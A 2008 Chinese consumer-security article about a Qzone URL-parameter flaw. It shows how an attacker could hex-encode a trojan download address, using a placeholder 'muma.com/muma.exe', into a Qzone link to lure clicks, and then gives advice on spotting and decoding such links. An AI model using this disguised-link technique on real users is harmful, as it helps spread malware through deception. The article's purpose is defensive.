保卫家园 如何防范你的Qzone被黑客攻击

2008-1-28 15:47:19　　作者：模板天下收集整理　　来源：未知　网友评论 0 条　论坛

　　由于QQ在桌面IM领域占据着绝对霸主地位，在其身上衍生的各种产品也变得日益流行，而Qzone也逐渐成为网友书写日志和展示个性的地方。因此，Qzone的安全性也备受关注。不过，Qzone近日却爆出了一个跨站漏洞，这个漏洞非常容易被黑客利用。那么，黑客一般会如何通过这个漏洞来攻击普通用户呢？作为用户，我们又如何来防范这一漏洞的危害呢？

　　 一、模拟黑客攻击

　　 这里，我们首先来了解这个漏洞的具体情况。Qzone的跨站漏洞是网友无意中打开类似"http://user.qzone.qq.com/QQ号码?url=任意字母"时发现的，这时网页显示为一个框架网页，中间为"无法打开网页"的空白页面（如图1）；然而，当输入类似"http://user.qzone.qq.com/QQ号码?url=http://www.baidu.com"的地址时却可以正常显示，这时url后的网址其实在幕后是加载的。那么，Qzone的跨站漏洞又是如何被黑客作为木马的媒介的呢？

　　 Qzone默认加载的地址要小心

　　 第一步：黑客需要对该地址进行乔装改扮一番。比如：网页木马的url为"http://www.muma.com/muma.exe"。黑客会使用URl加密技术来为木马地址作掩护，常用的方法是把url地址转换为16进制。

　　 黑客常用URL伪装器

　　 第二步：黑客将Qzone的地址设置为"http://user.qzone.qq.com/QQ号码?url=%68%74%74%70%3A%2F%2F%77%77%77%2E%6D%75%6D%61%2E%63%6F%6D%2F%6D%75%6D%61%2E%65%78%65"并在网页上贴出Qzone的地址来引诱网友点击，用户往往点击了该地址下载运行了木马还蒙在鼓里。

　　 二、如何防范Qzone攻击

　　 方法1：既然这一跨站漏洞这么隐蔽，用户感染的几率也不会低。我们需要如何来防范这一漏洞可能造成的危害呢？做到不感染病毒，未雨绸缪是最有效果的。因此，我们在访问网友的Qzone前，要多长几个心眼，要观察其网址的形式。

　　 一般正常的Qzone的地址是"http://user.qzone.qq.com/号码"或者"http://号码.qzone.qq.com/"形式的，如果出现"http://user.qzone.qq.com/QQ号码?url="的地址就要谨慎了，Qzone也可能出现类似"http://user.qzone.qq.com/号码/?url=http%3A//photo.qq.com/tips_jump.htm%23uin%3D号码%26albumid%3D393029702%26photoid%3D"的地址，如果地址里面完全没有QQ的地址段，那么为了防止下载运行网页木马，可以将url后的字符输入到ASCII码随心换软件进行地址转换（如果是像以上地址的格式，可以将%后的十六进制字符逐个进行转换来获得完整地址），如果url指向可执行文件就不能点击了。

　　 方法2：为了防止系统被种植网页木马，还可以安装杀毒软件和防火墙并需要开始实时文件和网络监控，这样即使下载了网页木马也会被清除。如果发现了可疑的Qzone地址要及时举报，让黑客成为过街老鼠，毫无藏身之处。

　　 小结:Qzone的跨站漏洞被用来种植木马具有受众广的特点，Qzone的地址经过加密化装后，又有几个人会仔细地进行甄别呢？因此，利用人们偷窥人家隐私空间的好奇心来传播木马是很有效果的。

　　 其实，要防范Qzone地址在你的电脑种植木马也不难，最简单的方法就是只点击QQ资料里的Qzone地址，不去其他网站点击就可以了。另外，需要使用具有防范IE漏洞的安全工具和杀毒软件来查杀这类木马的下载安装，如：瑞星卡卡。携带木马的Qzone地址一经发现要马上通知网友，决不姑息，不让其他人成为黑客的牺牲品。同时，每次Qzone提示升级我们也最好升级不用嫌麻烦而取消升级，以免被黑客利用其他未知的漏洞。

共分1页  [1]

>> 相关文章